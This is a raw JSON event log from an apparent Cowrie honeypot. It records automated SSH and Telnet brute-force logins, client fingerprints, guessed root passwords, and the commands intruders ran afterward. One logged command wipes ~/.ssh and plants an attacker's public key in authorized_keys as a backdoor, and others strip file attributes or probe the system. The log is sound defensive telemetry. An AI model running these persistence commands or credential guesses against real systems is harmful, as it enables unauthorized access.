"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 9052c4ab4164c78256e71143dcfc7eac","sensor":"my-vps","timestamp":"2025-08-28T07:31:37.277535Z","src_ip":"212.227.235.229","session":"cf8bf3e7d5e8"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:31:37.712580Z","src_ip":"212.227.235.229","session":"cf8bf3e7d5e8"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":47752,"dst_ip":"1.2.3.4","dst_port":23,"session":"d76479d5503b","protocol":"telnet","message":"New connection: 8.222.212.69:47752 (1.2.3.4:23) [session: d76479d5503b]","sensor":"my-vps","timestamp":"2025-08-28T07:32:07.658524Z"}
{"eventid":"cowrie.session.closed","duration":37.727580308914185,"message":"Connection lost after 37 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:32:45.386041Z","src_ip":"8.222.212.69","session":"d76479d5503b"}
{"eventid":"cowrie.session.closed","duration":120.01096081733704,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:32:55.307415Z","src_ip":"212.227.125.160","session":"c627cea6ba89"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":54510,"dst_ip":"1.2.3.4","dst_port":23,"session":"54050e5b857b","protocol":"telnet","message":"New connection: 8.222.212.69:54510 (1.2.3.4:23) [session: 54050e5b857b]","sensor":"my-vps","timestamp":"2025-08-28T07:33:03.621343Z"}
{"eventid":"cowrie.session.closed","duration":31.432718992233276,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:33:35.053984Z","src_ip":"8.222.212.69","session":"54050e5b857b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":62014,"dst_ip":"1.2.3.4","dst_port":22,"session":"b38d13a69170","protocol":"ssh","message":"New connection: 212.227.125.160:62014 (1.2.3.4:22) [session: b38d13a69170]","sensor":"my-vps","timestamp":"2025-08-28T07:34:03.375233Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T07:34:03.375929Z","src_ip":"212.227.125.160","session":"b38d13a69170"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T07:34:03.487944Z","src_ip":"212.227.125.160","session":"b38d13a69170"}
{"eventid":"cowrie.login.failed","username":"user","password":"kaktus","message":"login attempt [user/kaktus] failed","sensor":"my-vps","timestamp":"2025-08-28T07:34:04.519197Z","src_ip":"212.227.125.160","session":"b38d13a69170"}
{"eventid":"cowrie.login.failed","username":"user","password":"harder","message":"login attempt [user/harder] failed","sensor":"my-vps","timestamp":"2025-08-28T07:34:05.624245Z","src_ip":"212.227.125.160","session":"b38d13a69170"}
{"eventid":"cowrie.login.failed","username":"user","password":"eduard","message":"login attempt [user/eduard] failed","sensor":"my-vps","timestamp":"2025-08-28T07:34:06.741568Z","src_ip":"212.227.125.160","session":"b38d13a69170"}
{"eventid":"cowrie.login.failed","username":"user","password":"dylan","message":"login attempt [user/dylan] failed","sensor":"my-vps","timestamp":"2025-08-28T07:34:08.216890Z","src_ip":"212.227.125.160","session":"b38d13a69170"}
{"eventid":"cowrie.login.failed","username":"user","password":"dead","message":"login attempt [user/dead] failed","sensor":"my-vps","timestamp":"2025-08-28T07:34:09.342008Z","src_ip":"212.227.125.160","session":"b38d13a69170"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:34:10.805109Z","src_ip":"212.227.125.160","session":"b38d13a69170"}
{"eventid":"cowrie.session.connect","src_ip":"146.190.163.8","src_port":45090,"dst_ip":"1.2.3.4","dst_port":23,"session":"cb902747d24b","protocol":"telnet","message":"New connection: 146.190.163.8:45090 (1.2.3.4:23) [session: cb902747d24b]","sensor":"my-vps","timestamp":"2025-08-28T07:34:35.584471Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T07:34:35.977863Z","src_ip":"146.190.163.8","session":"cb902747d24b"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":35582,"dst_ip":"1.2.3.4","dst_port":23,"session":"6a257711570e","protocol":"telnet","message":"New connection: 8.222.212.69:35582 (1.2.3.4:23) [session: 6a257711570e]","sensor":"my-vps","timestamp":"2025-08-28T07:34:37.220479Z"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T07:34:37.344834Z","src_ip":"146.190.163.8","session":"cb902747d24b"}
{"eventid":"cowrie.session.closed","duration":4.62609601020813,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:34:40.210500Z","src_ip":"146.190.163.8","session":"cb902747d24b"}
{"eventid":"cowrie.session.connect","src_ip":"146.190.163.8","src_port":45106,"dst_ip":"1.2.3.4","dst_port":23,"session":"8795f760bc85","protocol":"telnet","message":"New connection: 146.190.163.8:45106 (1.2.3.4:23) [session: 8795f760bc85]","sensor":"my-vps","timestamp":"2025-08-28T07:34:40.366874Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:34:40.770791Z","src_ip":"146.190.163.8","session":"8795f760bc85"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:34:40.858333Z","src_ip":"146.190.163.8","session":"8795f760bc85"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-28T07:34:41.051744Z","src_ip":"146.190.163.8","session":"8795f760bc85"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:34:42.191640Z","src_ip":"146.190.163.8","session":"8795f760bc85"}
{"eventid":"cowrie.session.closed","duration":1.829749345779419,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:34:42.196551Z","src_ip":"146.190.163.8","session":"8795f760bc85"}
{"eventid":"cowrie.session.closed","duration":34.03835129737854,"message":"Connection lost after 34 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:35:11.258770Z","src_ip":"8.222.212.69","session":"6a257711570e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":25885,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd521351c421","protocol":"ssh","message":"New connection: 212.227.235.229:25885 (1.2.3.4:22) [session: cd521351c421]","sensor":"my-vps","timestamp":"2025-08-28T07:35:21.616160Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:35:21.814770Z","src_ip":"212.227.235.229","session":"cd521351c421"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:35:22.097731Z","src_ip":"212.227.235.229","session":"cd521351c421"}
{"eventid":"cowrie.login.success","username":"root","password":"0899858153","message":"login attempt [root/0899858153] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:35:24.198849Z","src_ip":"212.227.235.229","session":"cd521351c421"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:35:25.416193Z","src_ip":"212.227.235.229","session":"cd521351c421"}
{"eventid":"cowrie.command.input","input":"mount | head -5","message":"CMD: mount | head -5","sensor":"my-vps","timestamp":"2025-08-28T07:35:25.416909Z","src_ip":"212.227.235.229","session":"cd521351c421"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","size":28,"shasum":"eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:35:25.988774Z","src_ip":"212.227.235.229","session":"cd521351c421"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:35:26.394172Z","src_ip":"212.227.235.229","session":"cd521351c421"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61486,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf829d8c6693","protocol":"ssh","message":"New connection: 217.72.205.35:61486 (1.2.3.4:22) [session: cf829d8c6693]","sensor":"my-vps","timestamp":"2025-08-28T07:36:20.079528Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:36:20.080593Z","src_ip":"217.72.205.35","session":"cf829d8c6693"}
{"eventid":"cowrie.session.connect","src_ip":"85.122.120.73","src_port":33488,"dst_ip":"1.2.3.4","dst_port":22,"session":"b41ba5144050","protocol":"ssh","message":"New connection: 85.122.120.73:33488 (1.2.3.4:22) [session: b41ba5144050]","sensor":"my-vps","timestamp":"2025-08-28T07:37:52.586611Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:37:52.587537Z","src_ip":"85.122.120.73","session":"b41ba5144050"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:37:52.626162Z","src_ip":"85.122.120.73","session":"b41ba5144050"}
{"eventid":"cowrie.login.success","username":"root","password":"abc123--","message":"login attempt [root/abc123--] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:37:52.822880Z","src_ip":"85.122.120.73","session":"b41ba5144050"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:37:52.918159Z","src_ip":"85.122.120.73","session":"b41ba5144050"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T07:37:52.918924Z","src_ip":"85.122.120.73","session":"b41ba5144050"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T07:37:52.920314Z","src_ip":"85.122.120.73","session":"b41ba5144050"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:37:52.960162Z","src_ip":"85.122.120.73","session":"b41ba5144050"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:37:53.166278Z","src_ip":"85.122.120.73","session":"b41ba5144050"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T07:37:53.167129Z","src_ip":"85.122.120.73","session":"b41ba5144050"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T07:37:53.209487Z","src_ip":"85.122.120.73","session":"b41ba5144050"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:37:53.210522Z","src_ip":"85.122.120.73","session":"b41ba5144050"}
{"eventid":"cowrie.session.connect","src_ip":"85.122.120.73","src_port":33600,"dst_ip":"1.2.3.4","dst_port":22,"session":"059bbd96066f","protocol":"ssh","message":"New connection: 85.122.120.73:33600 (1.2.3.4:22) [session: 059bbd96066f]","sensor":"my-vps","timestamp":"2025-08-28T07:37:53.261651Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:37:53.262252Z","src_ip":"85.122.120.73","session":"059bbd96066f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:37:53.310876Z","src_ip":"85.122.120.73","session":"059bbd96066f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T07:37:53.550004Z","src_ip":"85.122.120.73","session":"059bbd96066f"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:37:54.601440Z","src_ip":"85.122.120.73","session":"059bbd96066f"}
{"eventid":"cowrie.session.connect","src_ip":"85.122.120.73","src_port":34050,"dst_ip":"1.2.3.4","dst_port":22,"session":"195a7a31e888","protocol":"ssh","message":"New connection: 85.122.120.73:34050 (1.2.3.4:22) [session: 195a7a31e888]","sensor":"my-vps","timestamp":"2025-08-28T07:37:54.650496Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:37:54.651274Z","src_ip":"85.122.120.73","session":"195a7a31e888"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:37:54.700363Z","src_ip":"85.122.120.73","session":"195a7a31e888"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:37:54.953531Z","src_ip":"85.122.120.73","session":"195a7a31e888"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:37:55.001122Z","src_ip":"85.122.120.73","session":"b41ba5144050"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:37:55.005686Z","src_ip":"85.122.120.73","session":"195a7a31e888"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.142.227","src_port":46166,"dst_ip":"1.2.3.4","dst_port":22,"session":"039f126d8fb2","protocol":"ssh","message":"New connection: 14.103.142.227:46166 (1.2.3.4:22) [session: 039f126d8fb2]","sensor":"my-vps","timestamp":"2025-08-28T07:38:24.125178Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:38:24.126162Z","src_ip":"14.103.142.227","session":"039f126d8fb2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:38:24.306396Z","src_ip":"14.103.142.227","session":"039f126d8fb2"}
{"eventid":"cowrie.login.success","username":"root","password":"Bus365.com!@#","message":"login attempt [root/Bus365.com!@#] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:38:25.412461Z","src_ip":"14.103.142.227","session":"039f126d8fb2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:38:25.795009Z","src_ip":"14.103.142.227","session":"039f126d8fb2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T07:38:25.795698Z","src_ip":"14.103.142.227","session":"039f126d8fb2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T07:38:25.796936Z","src_ip":"14.103.142.227","session":"039f126d8fb2"}
